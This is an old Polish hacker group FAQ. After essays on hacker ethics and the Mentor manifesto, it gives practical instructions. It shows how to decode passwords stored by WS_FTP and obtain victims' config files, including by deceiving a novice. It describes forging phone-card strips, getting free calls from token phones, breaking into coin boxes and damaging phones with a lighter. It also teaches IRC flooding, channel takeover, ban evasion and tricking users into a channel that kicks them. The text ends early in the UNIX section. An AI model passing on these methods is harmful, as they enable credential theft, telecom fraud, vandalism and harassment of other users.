FAQ of Dead Hackers Society
                               ver: 0.5
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
WSZYSTKIE INFORMACJE SA TUTAJ ZAWARTE W CELACH EDUKACYJNYCH
WSZYSTKO ROBISZ NA WLASNA ODPOWIEDZIALNOSC, DHS NIE PONOSI ODPOWIEDZIALNOWSCI ZA
JAKIEGOLWIEK SZKODY ZWIAZANE Z PRAKTYKAMI TUTAJ OPISANYMI...
!ZABRANIA SIE ZMIENIANIA TRESCI FAQ, W JAKIM KOLWIEK MIEJSCU!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
FAQ MOZE BYC DOWOLNIE KOPIOWANE I ROZPOWSZECHNIANE POD WARUNKIEM ZE W CALOSCI Z
ZACHOWANIEM ORGINALNYCH TEXTOW
================================================================================
Cos od nas:
Dead Hackers Society to nowa polska grupa, skladajaca sie z roznych osobnikow
w zasadzie nie propagujemy tylko Hackingu. Jestesmy zainteresownai rowniez
innymi rzeczami. Virii, destructing, phreackering itp... W zasadzie wszystko.
Wiemy ze pewnie nasze FAQ moze zostac uznane za lamerskie, bo polska "scena"
jest pelna roznych nietolerancyjnych osobistosci, niestety:( W tym faq mamy
zamiar zajmowac sie nie tylko hackingiem ale tez innymi rzeczami...
Jesli jestes zainteresowany podaniem jakis materialow do tego textu to bardzo
prosze.. Zlap mnie na IRC i podaj txt, po przeczytaniu i uznaniu ze sie nadaje
zostanie tutaj zamieszczony...
W krotce powinna byc gotowa nasza publiczna strona WWW...
================================================================================
* -nowe
+ -uaktualnienie
- -poprawione


* 0. WSTEP 
   0.1 Cos o DHS 
   0.2 Jakie jest zadanie tego FAQ

* 1. Hacking (bardziej teroria i idee) :LordCreg
   1.1 O co w tym wszystkim chodzi? :LordCreg
   1.2 Etyka Hackera : AnGel
   1.3 Manifest : zamieszczone przez Crega
   1.4 Refleksja :znalezione przez LordCreg`a
   1.5 Fuck the system: LordCreg
   
* 1,5. HACK
   1,5.1 Bug w WS_FTP: Misiek
 
* 2.Phreak :Hellfire
   2.0. Co to jest phreakering :LordCreg
   2.1. Karty magnetyczne :Hellfire
   2.2. Budki telefoniczne na zetony :Hellfire

* 3. IRC war
   3.1. Po co prowadzi sie wojny na IRC? :Hellfire
   3.2. Co to jest bot? :Hellfire
   3.2.1. Jak zabic bot-a? :Hellfire
   3.3. CTCP Flood :Hellfire
   3.4. Net Split :Hellfire
   3.5. Jak nie dostac bana? :Hellfire
   3.6. Jak ominac bana? :Hellfire
   3.7. Jak sie pozbyc restrykcji? :Hellfire
   3.8. Kilka sztuczek :Hellfire

* 4. Lamanie systemow UNIXowych
   4.1. UNIX - podstway :Hellfire
   4.2. Co nam bedzie potrzebne :Hellfire
   4.3. Wlamywanie - teoria :Hellfire
   4.4. Jak zdobyc plik passwd? :Hellfire
   4.5. Jak zdobyc plik shadow? :Hellfire
   4.6. Mam konto... i co? :Hellfire
   4.7. Sendmail 
      4.7.1 Sendmail 8.8.4 :Hellfire
   4.8. Exploity
      4.8.1. Debian 1.1 :Hellfire
      4.8.2. RedHat :Hellfire
           4.8.2.1. dump bug :Hellfire
           4.8.2.2. abuse :Hellfire
           4.8.2.3. rootshell :Hellfire
      4.8.3. Single :Hellfire
      4.8.4. FreeBSD 2.2.1 :Hellfire
      4.8.5. Linux-y :Hellfire
      4.8.6. HTTP/1.0 Server :Hellfire
      4.8.7. AIX 4.1/4.2 :Hellfire
      4.8.8. Windows 95/NT :Hellfire
      4.8.9. SunOs 4.1.1 Sparc 20 :Hellfire

* 5. The Microsoft Windows 95
   5.1. Kilka slow o Bilu Gates-ie i jego windowsie :Hellfire
   5.2. Jak zabic windowsa? :Hellfire
   5.3. WWWWW - Windows W World Wide Web :Hellfire
   5.4. Internet Provider: Nemes  

 


--------------------------------------------------------------------------------
0 WSTEP

0.1) Cos o DHS:

Wiec DHS to nowa grupa na polskiej "scenie" o ile to wogole
mozna nazwac scena... Naszym zadaniem jest nauczyc lamera co wiedziec powinien,
a komus kto juz cos wie zapewnic dalsza edukacje... Wiemy ze moze bedziemy
wyszydzani przez niektorych osobnikow ze lameria i inne bzdety, ale nam to WALI!
Grupka zajmuje sie nie tylko hackingiem. Jestesmy otwarci na wszelkie propozycje
takie jak:
hacking
phreaking
virii (jesli ktos ma ochote)
i inne...

Tylko jesli ktos chce na przyklad zostac tworca virii, to przydalo by sie zeby
w naszych szeregach bylo paru gosci o takich zainteresowaniach, coby sobie na
wzajem pomagali:)
Planujemy podzielic grupe na sekcje o danych "profilach" i bedzie spx.

0.2) Jakie jest zadanie tego FAQ:

To faq ma za zadanie wyjasnic podstawy i niektore zagadnienia zwiazanie z
roznymi tematami. Glownie hackingu. Nie bedzie tu odrazu napisane jak sie
wlamac do NASA, bo to nie o to chodzi. Jesli jestes calkowitym lamerem, ktory
nie wiem co to shadow, to sie tu tego dowiesz. Dowiesz sie jaka jest budowa
pliku passwd i pare innych rzeczy... A jesli chcialbys dodac cos, bo napisales
jakis text, to nie ma sprawy.Wyslij txt na adres: grzywacz@ptk.krakow.pl i jesli
bedzie sie nadawal, to zamiescimy go tutaj:)

1. Hacking
Tu sa raczej txty sklaniajace do refleksji, a nie o hackingu jako takim, ale
wypadalo by wiedziec jakie sa hackerski idee i wogole caloksztalt tego
wszytskiego.

 1.1 O co w tym wszystkim chodzi?

Heh wiec chcialbys zostac hackerem....Hmmm na pewno chcesz?? Wiesz wogole o co
w tym wszytskim chodzi?? Myslisz ze hacking polega na wlamaniu sie do systemu
i wykasowniu szystkich twardych dyskow, lub namieszaniu tak zeby
nic juz nie dalo sie zrobic?? Jesli tak myslisz, to jestes w bledzie!!!
Idea hackingu jest bardzo piekna, tylko niekiedy bardzo trudna w praktyce.
WOLNOSC SLOWA ORAZ INFORMACJI!!!! Jak to jest napisane w 2 numerze H@CKPL:
Informacja jest wladza!Wuolnic informacje!!
Czyli wszystko dla wszytskich bez podzialow!
Wlamujemy sie po to zeby poznac doladniejsza budowe i zasade dzialania danego
systemu... Mamy satysfakcje z tego ze zlamalismy kolejny sys, ze jestesmy lepsi.
Ludzie sie wlamuja, zmieniaja rzadawa strone WWW i mysla ze juz z nich wielcy
hackerzy... Nie chodzi mi tu o to aby zbruzgac tych z DAMAGE.INC ale... 
Niestety w ostatnich czasach hacketyka upada i to bardzo nisko:(
(chodzi mi tu o POLSKE)
Nie mowie ze ja odrazu jestem hackerem i wogole najleprzy, bo oczywiscie tak 
nie jest...
A oto dobry text autorstwa Angela mniej, wiecej nakreslajacy o co w tym
wszystkim chodzi.

 1.2 Etyka Hackera by AnGel

				Etyka hackera

Przebywajac na IRC`u czesto w pewnym momencie ktos cie pyta "czy ty jestes hackerem" ?
A ty na to nieskromnie odpowiadasz "Jasne lamerze !!! " ;) ( to tylko przyklad ).
No wlasnie, kim jest prawdziwy hacker ? Po czym to poznac ?
Hacker w zlym porownaniu moze byc od uzytkownikia komputera do kogos, kto niszczy wszystko
do czego moze sie wlamac. 
Np. idioci, ktorzy maja nadzianych starych dostaja komputery. Koles ma zalozmy Pentium II
i modem 33,600. Maja dostep do sieci przez TP SA i sa boss`ami. Jakos dostaja sie do 
naprawde dobrego ;) systemu i znajda kilka plikow o haczeniu. Albo jakis prawdziwy hacker
ulituje sie nad lamerem i da mu np. kilka numerow etc. Palant dostaje sie do tego systemu
Sciaga jakies pliki i kasuje wszystko co wpadnie mu w rece. Prawdziwy lamer.
Prawdziwy hacker...no wlasnie, kim on jest ?
Prawdziwi hackerzy sa inteligenti ;) poniewaz musza tacy byc. Chodza do naprawde dobrych 
szkol poniewaz nie maja nic lepszego do roboty, albo nie chodza bo szkola jest okropnie
nudna. Jednak wiekszosc chodzi do szkol ;). Prawdziwy hacker chce wiedziec wszytsko. 
Hackerzy sa znudzeni, poniewaz szkola uczy nudnych rzeczy w kolko, nie wprowadza nic nowego,
nic co wyzywalo by na pojedynek.
Prawdziwi hackerzy sa przede wszystkim cierpliwi. Jesli taki nie jestes to po co ciezko
pracujesz hackujac pojedynczy system, dla jednego nedznego konta, na ktorym nawet nie
mozna postawic bota z powodu slimaczego transferu ;)))))
Prawdziwy hacker NIE WLAMUJE sie do systemu zeby zabic wszystko albo sprzedac dane komus
obcemu. Prawdziwi hackerzy pragna sie uczyc, albo chca udowadniac sobie ze sa na tyle 
dobrzy by wlamac sie do obcego systemu ( ach ta duma...;). Pragna poruszac sie bez 
ograniczen w systemie w ktorym nigdy nie byli. Chca explorowac "swiaty" ktore fascynuja
ich egzotyka kont i szarych uzytkownikow systemu... Po co niszczyc cos, co moze dawac tyle
satysfakcji komus innemu ? Po co grupka lamerow ma psuc opinie elicie ?
Prawdziwi hackerzy sa przezorni. Mam na mysli to ze trzymaja mordy zamkniete na klodke.
Nie zadaja poklasku swoich dokonan ( oczywiscie sa wyjatki ). Powiesz kumplom ze szkoly
a w niedlugim czasie ludzie z wladza dowiedza sie kto ty jestes, co zrobiles i masz klopoty...
Za bardzo nie wiem komu ten plik moze sluzyc, moze komus kto to przeczyta i wreszcie pozna
prawde o hackerach. To nie sa klamstwa ani wymysly. Pamietaj o tym ze grupka lamerow nie moze
odpowiadac za wszystkich hackerow. Tu nie ma zasady "jeden za wszytskich, wszyscy za 
jednego". Ten txt ma uzmyslowic ludziom, ktorzy lubia miec przyczepiona plakietke "HACKER"
ze nie w tym rzecz.


									AnGeL
 1.3 Manifest:

A oto txt, nazwany manifestem hackerow, w jezyku angielskim, jak bede mial
chwile czasu i ochoty to postaram sie go przetlumaczyc:)

Mentor's Last Words

"Mentor's Last Words"

Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank
Tampering"... Damn kids.  They're all alike. But did you, in your three-
piece psychology and 1950's technobrain, ever take a look behind the
eyes of the hacker?  Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me...  Damn underachiever.
They're all alike. I'm in junior high or high school.  I've listened to
teachers explain for the fifteenth time how to reduce a fraction.
I understand it.  "No, Ms. Smith, I didn't show my work.  I did it in
my head..." Damn kid.  Probably copied it.  They're all alike.
I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...  Or feels threatened by
me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be
here... Damn kid.  All he does is play games.  They're all alike. And then
it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out,
a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where I belong..." I know everyone here... even
if I've never met them, never talked to them, may never hear from them
again... I know you all... Damn kid.  Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been
spoon-fed baby food at school when we hungered for steak... the bits of
meat that you did let slip through were pre-chewed and tasteless.
We've been dominated by sadists, or ignored by the apathetic.  The few
that had something to teach found us willing pupils, but those few are
like drops of water in the desert.
   This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals.  We explore... and you call us
criminals.  We seek after knowledge... and you call us criminals.  We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our
own good, yet we're the criminals.
   Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto.  You may stop
this individual,but you can't stop us all... after all, we're all alike.
                            +++The Mentor+++
[May the members of the phreak community never forget his words -JR]

 1.4 Refleksja

Autor jest nie znany, ale jedno jest pewne,wedlug mnie ma racje!![LdCreg]
Aha w 100% autor jest z Polski, TO NIE JEST TLUMACZENIE

Moja refleksja
Jestesmy mala drobinka w swietle ogarniajacego nas Wrzechswiata...
Wszytsko jest niczym w porownaniu z Dzielem Stworzenia... Zycie nie ma sensu,
a jesli ma, to tylko w naszym marnym swiecie nazwanym Ziemia... Wszytsko jest
tu wzgledne... A Wielki patrzy i mysli co bedzie dalej...
Nie jestesmy sami, jest wiele innych cywilizacji we Wrzechswiecie.
NIektore sa bardziej rozwiniete od nas, sa na wyzszym stopniu duchowym... I dla
nich zupelnie inne wartosci maja wyzszy sens. W tej chwili nie widze sensu
zycia. Po co sie czlowiek rodzi jak i tak umrze i przejdzie do wyzszego poziomu
rozwoju duchowego? Co ma sens?? Milosc, jak sie ma kogos, kto kocha, to moze
i tak. Otoz ja mam taka osobe, ktora kocham, ale mimo wszystko nie stracilem
wiary w stare wartosci... Po co zyjemy? Jaki jest w tym sens?
Gdzies pisali ze Stworca stworzyl czlowieka, poniewaz byl samotny... A jest
napisane ze bedzie OMEGA, ale po co niszczyc cos co sie stworzylo dla wyzszego
celu??A na swoje podobienstwo, poniewaz czlowiek umie kochac, tak jak Bog, ktory
umilowal czlowieka nade wszystko...
Jestem pseudo Anarchista, bo nie widze sensu tego calego gowna...
Prawie wszystko mi wali! Ale niestety nie mozemy powiedziec sobie: "DOSC!"
Bo to wszystko ma sens, ale tylko w naszym malym swiatku, w ktorym zyjemy.
NIektorzy nie zauwazaja, ze ten maly swiatek nie ma wyzszego sensu. I wszysko
jest w nim do chrzanu.

Jestem Anarchista, ale przede wszystkim Hackerem, czyli buntownikiem
Chce odkrywac nie zbadane systemy, poznawac ich budowe. I miec satysfakcje
ze zlamalem kolejny i ze jestem leprzy od innych, ktorzy to stworzyli i
zarzadzaja tym shitem...
Ktos moze powiedziec co za palant, pisze najebane texty i wogole. Jesli tak
myslisz, to znaczy ze wogole nie pojales idei tego textu, jego przeslania.
Anonim...


1.5 FuCk da SyStEm by LordCreg:

Jestesmy hackerami... odkrywamy nie zbadane przestrzenie komputerowych
systemow. Pomagamy odkrywac nowe bugi w zapezpieczeniach. Wiec dlaczego
nazywaja nas przestepcami. Poniewaz potrafimy zalatwic sobie nieograniczony
dostep, do niektorych systemow, wbrew woli ich marnych administratorow. Jest
to im nie na reke... Ale my mamy to gdzies i dalej robimy swoje. Pod oslana
spooferow i killogow. Dlatego nie moga nam nic udowodnic, chyba ze na prawde
spieprzymy robote i nas namierza, ale i tak musieli by nas zlapac na goracym
uczynku. Ale i tak sa marne szanse na zlapanie nas, jako nielegalnych
komputerowcow w swietle prawa, ktore i tak niegdy nie bedzie doskonale...
Rozpoznajecie ten cytat?:

"Budujesz bomby atomowe, wszczynasz wojny, mordujesz i oszukujesz,
 oklamujesz nas i probujesz nam wmowic ze to dla naszego dobra, a to my
 jestesmy przestepcami.

 Tak jestem przestepca. Moim przestepstwem jest ciekawosc.
 Moim przestepstwem jest ocenianie ludzi na podstawie tego co mowia i musla,
 nie jak wygladaja. Moim przestepstwem jest to ze jestem madrzejszy od
 ciebie i nigdy mi tego nie wybaczysz. Jestem hackerem, a to jest moj
 manifest. Mozesz powstrzymac mnie, ale nie jestes w stanie powstrzymac
 nas wszystkich, bo przeciez wszyscy jestesmy tacy sami..."

Ten cytat pochodzi z slawnego manifestu hackerow, caly txt znajduje sie wczesniej

Nie wiem komu moze ten text posluzyc, ale poruszylem tu sprawe tylko i
wylacznie socjologiczna, z reszta jak zwykle.

1,5 HACK

1,5.1 Bug w WS_FTP
Opisze tu buga zawartego w programie WS_FTP ...
Bug ten zostal zauwazony przez Miloscha Meriaca (podobno...tak twierdzi P0wer w swoim faq-u).
Polega on na tym ze program ten w pliku  ws_ftp.ini  zapisuje hasla z kont z ktorymi 
laczy sie uzytkownik.
Hasla te sa oczywiscie zakodowane lecz metoda kodowania jest slabiutka.....
Oto przykladowy wycinek z ws_ftp.ini :

      [Hacker]
      HOST=www.hacker.org
      UID=hacker
      PWD=616465687778
      LOCDIR=C:\
      DIR=/

A wiec po kolei....
Metoda uzywana przez ws_ftp polega na zamienianiu hasla na hexy i odjecia od liczby decymalnej 
miejsca na ktorym stoi wartosc.
tzn.: haslo: 616465687778    dzielimy na czesc po dwie liczbg (decymalnie)

61      64      65     68    77    78
-0      -1      -2     -3    -4    -5
czyli
61      63      63     65    73    73     -    jest to juz rozkodowane haslo zapisane w systemie
[postawiamy litery]                                 						szesnastkowym
 a       c       c      e     s     s                                            

A ot przyporz╣dkowane warto£ci decymalne i znaki...:

a - 61       A - 41      0 - 30      , - 2C
b - 62       B - 42      1 - 31      . - 2E
c - 63       C - 43      2 - 32      < - 3C
d - 64       D - 44      3 - 33      > - 3E
e - 65       E - 45      4 - 34      ? - 3F
f - 66       F - 46      5 - 35      | - 7C
g - 67       G - 47      6 - 36      ` - 60
h - 68       H - 48      7 - 37      ' - 27
i - 69       I - 49      8 - 38      : - 3A
j - 6A       J - 4A      9 - 39      ; - 3B
k - 6B       K - 4B                  " - 22
l - 6C       L - 4C      ! - 21      + - 2B
m - 6D       M - 4D      @ - 40      = - 3D
n - 6E       N - 4E      # - 23      - - 2D
o - 6F       O - 4F      $ - 24      _ - 5F
p - 70       P - 50      % - 25      \ - 5C
q - 71       Q - 51      ^ - 5E      / - 2F
r - 72       R - 52      & - 26      [ - 5B
s - 73       S - 53      * - 2A      ] - 5D
t - 74       T - 54      ( - 28      { - 7B
u - 75       U - 55      ) - 29      } - 7D
v - 76       V - 56
w - 77       W - 57
x - 78       X - 58
y - 79       Y - 59
z - 7A       Z - 5A


Oto kilka przyk│ad≤w....

34333237657827


34    33    32    37    65    78    27
-0    -1    -2    -3    -4    -5    -6

34    32    30    34    61    73    21    -    rozkodowane haslo w systemie szesnastkowym
[podstawiamy litery]
4      2     0     4     a     s     !


Kolejny przyk│ad:

746275677367


74    62    75    67    73    67
-0    -1    -2    -3    -4    -5

74    61    73    64    6F    62
[podstawiamy litery]
t     a     s     d     o     b


I to chybaa na tyle......    wszystko jest chyba jasne....

Na zdobycie pliku ws_ftp.ini sa dwa podstawowe sposoby....
Uzywamy ftp search (http://ftpsearch.ntnu.no) i sciagamy wszystkie dostepne pliki.....
Druga metoda polega na wt│udzeniu od kogos tego pliku...
np.: za szko│y, pracy..... lub od jakiegos lamera (ale musi byc to totalny lamer bo jak 
zna sie tylko troche na komputerach to wyczuje szwindel)
Puszczamy gosciowi kitze np: zapsul nam sie WS_FTP i rzeby nam przeslal 
plik od siebie z komputera....

I to juz koniec....
         
                    ------------------------------------
                    -             _Misiek_             -
                    -        bear@friko.onet.pl        -
                    -          bear@kki.net.pl         -     
                    -      http://kki.net.pl/bear      -
                    ------------------------------------

  2. Phreak

   Doszedlem do wniosku, ze rozdzial o phreaku moze zaszkodzic
   tylko jednej firmie, ktorej zreszta nie lubie  (nie  powiem
   jak sie nazywa bo mi odetna telefon) :))).

  2.0 Co to jest Phreaking by LordCreg

Wiec phreakering to kolejny odlam komputerowej subkultury, tak jak hacking:)
Polega on na tym, aby obrabiac telefony, tak aby moc dzwonic za darmo...
Na przyklad budki tel itp. Aby miec darmowe wyjscie na caly swiat...
Oczywiscie wszyscy znamy bardzo dobrze nasza kochana(uu ale wazelina)
Telekomunikacje Polska s.a., ktora jest monopolista na polskim rynku...
NIestety to ONA dyktuje nam ceny polaczenia telefonicznego, ktore wynosi
19 groszy za kazde 3 minuty rozpoczetego polaczenia, po taryfie lokalnej...
Jest to jedna z najdrozszych stawek w Europie i jedna z najgorszej jakosci
swiadczonych uslug... dlatego nie lubimy TP sa, ale jestesmy nania skazani...
Moze po prywatyzacji to sie zmieni... mam szczera nadzieje ze  tak!



   2.1. Karty magnetyczne

    Na poczatek zarys dzialania:

    ______________________________
    |                            |
    | Telekomunikacja Polska SA  |
    |                            |
    |                            |
    | #########################  |
    |           0           /100 |
    |  --1-- --2-- --3-- --4--   |
    ------------------------------

    Czesc magnetyczna karty jest podzielona na 4 czesci.  Jest
    tam zapisana  max  ilosc  impulsow.  Czesci  te  moga  byc
    namagnesowane dwoma biegunami (+ -) - mozna  to  sprawdzic
    biorac magnes i przesunac go dosc szybko nad  powieszchnia
    magnetyczna karty (poczujesz  wtedy  ze  magnes  raz  jest
    lekko przyciagany, a raz lekko odpychany). Najlepiej wtedy
    oddtworzyc te same pola mag. na tasmie wideo  przyklejonej
    na miejsce oryginalengo paska. Pasek trzeba przykleic  tak
    , zeby nie bylo zadnych widocznych  zmarszczen  (najlepiej
    uzyc tasmy samoprzylepnej  klejacej  z  dwuch  stron).  Ta
    metoda dziala i  jak  ktos  zrobi  to  dokladnie  tak  jak
    napisalem to powinno mu dzialac.Dobrze jest zostawic sobie
    kilka impulsow (2-3) na karcie przed rozpoczeciem ekspery-
    mentow,    poniewaz    budka    prawdopodobnie     zmienia
    namagnesowanie karty  przy  zjadaniu  ostatniego  impulsu.
    Jezeli chcemy zmienic maksymalna ilosc impulsow  wystarczy
    przylaczyc  silne  pole  magnetyczne  do  karty  i  chwile
    zostawic ( dla silnych elektromagnesow wystarcza  okolo  2
    minut).

   2.2. Budki telefoniczne na zetony

    Sporo budek tego rodzaju nie me wyjscia na  miedzymiastowa
    , ale mozna to zawsze ominac i rozmawiac z  calym  swiatem
    za 17gr/3min. Robimy to tak:
    1) wrzucamy zeton
    2) wystukujemu 0 - nie  z  klawiatury  ale  bardzo  szybko
       pukamy w widelki 10 razy. Zeby sie latwiej  liczylo  ja
       uzywam metody ze licze trojkami ( trzy trojki  i  potem
       jeszcze raz - 1231231231 )
    3) wstukujemy reszte numeru juz bez zera np. 700xxxxx

    Jest jeszcze taka metoda:  wyrwac  klapke  z  zetonami :))
    - nie trzyma sie wcale tak mocno

    Mozna jescze traktowac budke zapalarka do gazu albo  duzym
    kondensatorem ( jeden biegun do obudowy kabla sluchawki, a
    drugi probowac z roznymi czesciami  metalowymi  aparatu ).




 3. IRC war

   3.1. Po co prowadzi sie wojny na IRC?

      Na pewno nie raz wkurzyles kogos kto na dodatek byl opem
      , wtedy on wykopal cie z kanalu albo zabanowal ci konto.
      Wtedy poczules chec zemsty. Teraz nadejdzie jej czas!:-)

   3.2. Co to jest bot?

      Bot jest to program ktory imituje uzytkownika. Ma zapro-
      gramowany rozne funkcje taki jak wyrzucanie  za brzydkie
      slowa, autoop.  Bot  jest zjawiskiem bardzo wkurzajacym,
      bo jako tempa maszyna,czesto zle zaprogramowana obrzydza
      zycie reszcie uzytkownikow IRC. Czesto zdarza sie ze je-
      dynym opem jest bot, wtedy na kanal zlazi sie  lameria i
      nie ma sposobu na powyrzucanie badziewia. A wiec  ludzie
      nie stawiajcie botow, a jak musicie  to najpierw utworz-
      cie sobie inny kanal  i tam go  testujcie. I wprowadzcie
      mu funkcje, ze jak  zostanie  pozbawiony opa to niech po
      prostu wyjdzie z kanalu - jak  jakis bot siedzi na kana-
      le  na  ktorym nie  ma opow nie ma mozliwosci, zeby ktos
      nim zostal.

      3.2.1. Jak zabic bot-a?

       Najpierw trzeba zobaczyc co bot robi  i  poszukac  jego
       slabych punktow.  Najprostrza  metoda  to  spowodowanie
       "execes flood"-a, nastepuje to jak ktos za duzo  wysyla
       na kanal, wtedy serwer wyrzuca go za flood-a. Najlepiej
       jak bot odpowiada jakims glupim  komunikatem  na  rozne
       rzeczy takie jak ping czy msg. Wchodzisz wtedy  kilkoma
       uzytkownikami na IRC i kazdy np. pinguje bota 50  razy,
       gdy bot wykryje pingowanie czasami  puszcza  na  public
       komunikat w stylu "HELLFIRE proboje mnie floodowac!", a
       jak odpowie tak 200 razy w ciagu sekundy :)) to  bedzie
       mial wylot z serwera za flood-a. Mysle ze po tym  przy-
       kladzie nikt nie bedzie mial  problemow  z  wymysleniem
       innych metod na pozbycie sie natreta.

   3.3. CTCP flood

      CTCP (nie mylic z CCCP :-]) jest to zbior polecen  ktore
      wysylacja do komputera docelowego  pytanie,  a  komputer
      docelowy wysyla  odpowiedz.  Na  przyklad  komenda  PING
      wysyla do koputera docelowego pytanie w  stylu - ZYJESZ?
      a komputer docelowy odpowiada - ZYJE, wtedy jest jeszcze
      zapisany czas odpowiedzi. Mniej wiecej 3-4  uzytkownikow
      wysyla do ofiary pakiety po okolo 50 pytan (tak zeby nie
      wyleciec za flooda) - PING , VERSION  albo  inne.  Wtedy
      ofiara odpowiada na te  wszystkie  pytania  i  w  ktorym
      momecie serwer wysyla swoje PING i nie otrzymujac  znaku
      zycia od niego wyrzuca go z serwera jako tego ktory  sie
      juz rozlaczyl.

   3.4. Net Split

      Netsplit jest to slowo okreslajace rozlaczenie sie sieci
      Jezeli siec serwerow IRC wygladala by tak:

                3-----4----5----6----7
                |     |    |    |    |
                1--2--8    9   10    11
                   |       |    |
                  12---13  14---15

      To jezeli netsplit nastapi miedzy serwerami  6  i  7  to
      uzytkownicy serwerow 7 i 11 zostana  odcieci  od  reszty
      sieci. Takie rozlaczenie wykrywa np program link looker.
      Wtedy laczymy sie z takim  serwerem  komenda  /server  i
      prawdopodobnie jestesmy jedyna osoba  na  kanale,  czyli
      mamy OP-a! Wtedy mozemy odpalic program Multi Colide Bot
      i czekac, albo tylko czekac. Gdy sieci sie polacza wtedy
      mamy automatycnie status operatora!

   3.5. Jak nie dostac bana?

      Po pierwsze - nie podskakuj do operatorow!  Ale  nie  to
      bedzie tu tematem, a to jak nie dostac bana np za flooda
      , po prostu  puszczamy  flooda  i  szybko  wychodzimy  z
      kanalu, a jeszcze lepiej z serwera. Wtedy nikt nie zdazy
      sprawdzic z kad dzwonisz i nie zalozy ci  bana.  Chociaz
      ta metoda dziala tylko na boty, bo przy wejsciu na kanal
      serwer podaje z jakiego adresu dzwonisz.

   3.6. Jak ominac bana?

      Po pierwsze to trzeba unikac dostawania banow(punkt 1.5)
      , ale jak juz sie zdazy do nie trzeba sie wcale martwic.
      Sa dwa rodzaje banow,  jeden  dziala  na  nick  (pseudo)
      uzytkownika, a drogi na adres serwera  przez  ktory  sie
      laczysz. W pierwszym wystarczy  zmienic  nick-a  komenda
      /NICK twoj_nowy_nick , a w drogim jest nieco gorzej, ale
      wszystko jest do zrobienia. Po pierwsze sprawdzamy na co
      dostalismy bana komenda /mode #kanal b  wtedy  dostajemy
      liste banow, Piszemy  /whois  twoj_nick  i  widzisz  tam
      adres  pod   ktorym  jestes  rozpoznawany.  Jezeli  masz
      bana na cos w rodzaju *.gdynia.tpnet.pl a twoj adres  do
      tego pasuje, to czy nie przydalo by sie zmienic  twojego
      adresu na np. *.124.112.32 :)). Adresu jako  takigo  nie
      da sie zmienic, mozna go za to  przedstawic  jako  adres
      DNS (literowy), albo IP  (4 liczby).  Jezeli  dostalismy
      bana na jeden z nich nastepnym razem trzeba sie  pojawic
      pod innym. Wiekszosc serwerow podaje adrs DNS, podam  tu
      ten, ktorego ja uzywam zazwyczaj gdy chce zeby ujawniono
      tylko moj adres IP - irc.fu-berlin.de.  I  to  wszystko.
      Jezeli ktos mimo wzystko zalozy nam bana na  nasz  adres
      IP to wystarczy sie  rozlaczyc  i  polaczyc  jescze  raz
      , ale dziala to tylko na TPSA.


   3.7. Jak sie pozbyc restrykcji?

      Restrykcje na IRC - jest to atrybut (r) przyznawany przy
      podlaczeniu do serwera  uzytkownikom  uzywajacym modemu.
      Ogranicza on w sposob  istotny  mozliwosci  uzytkownika:
      nie mozna zmienic nick-a w trakcie  trwania  sesji,  nie
      zostaje sie operatorem kanalu gdy sie go zaklada,  nawet
      gdy  ktos  inny  da  ci  status  operatora  nie   mozesz
      korzystac  z  jego  uprawnien.  Zeby  sie  pozby c  tego
      natrectwa   napisz   po   polaczeniu   sie  do  serwera:
      /mode twoj_nick -r+i   ale   prawdopodobienstwo   za  to
      zadziala jest niewielkie  (ostatnio  dzialalo  tylko  na
      serwerze krakow.irc.pl). Droga metoda jest laczenie  sie
      przez serwer ktory nie naklada restrykcji na uzytkownika
      ja znam taki tylko jeden (irc.bt.net) ale nawet nie jest
      on taki wolny i dosc czesto wystepuje  na  nim  netsplit
      (czy to zle, czy dobrze osadzcie sami).

   3.8. Kilka sztuczek

      Tu przedstawie kilka przydatnych wiadomosci o IRC:
      Kanal #5,0 - jest to kanal  po  wejsciu  na  ktory  gosc
      jest wyrzucany ze wszystkich kanalow na ktorych jest :-)
      mozna poprostu komus wyslac msg ze zapraszasz go na  ten
      kanal albo zeby postapis  bardziej  hurtowo  i  wzbudzic
      mniej podejrzen napisz na public cos takiego:
      /action ivites you on channel #5,0
      wtedy u wszystkich na ekranie pojawi  sie  tekst  bardzo
      podobny  i  nieodroznialny  dla  lamera  od  prawdziwego
      invite :-P

  4. Lamanie systemow UNIXowych

   4.1. UNIX - podstway

      UNIX jak chyba kazdy wie jest systemem operacyjnym. Jest
      uzywany przedewszystkim jako serwer sieci. Jest systemem
      prostym ale o bardzo duzych  mozliwosciach.  Jest  dosyc
      podobny do systemu MS-DOS (chociaz ja  uwazam  osobiscie
      , ze to DOS jest  podobny  do  UNIXa).  Jest  to  system
      wielodostepny (ma do niego dostep wielu  uzytkownikow  i
      moga oni kozystac z niego jednoczesnie) i wielozadaniowy
      (czyli moze wykonywac wiele procesow jednoczesnie)  jest
      do tego 32 bitowy (i to nie podroba  jak  w Windows 95).
      Kazdy uzytkownik ktory laczy sie z UNIX-em dostaje swoja
      konsole  (terminal)  z  ktorej  wydaje  polecenia.  UNIX
      dzieli zasoby (dyski,pamiec,procesor) na  poszczegolnych
      uzytkownikow. Uzytkownika  opisuje  jego  nazwa  (login)
      ktora jest jawna i haslo ktore jest  tajne.  Uzytkownicy
      sa podzieleni na rozne grupy  dostepy,  ktore  okreslaja
      ich uprawnienia w systemie. Na szczycie stoji root i  on
      moze wszystko (prawie) - jest  to  glowny  uzytkownik  w
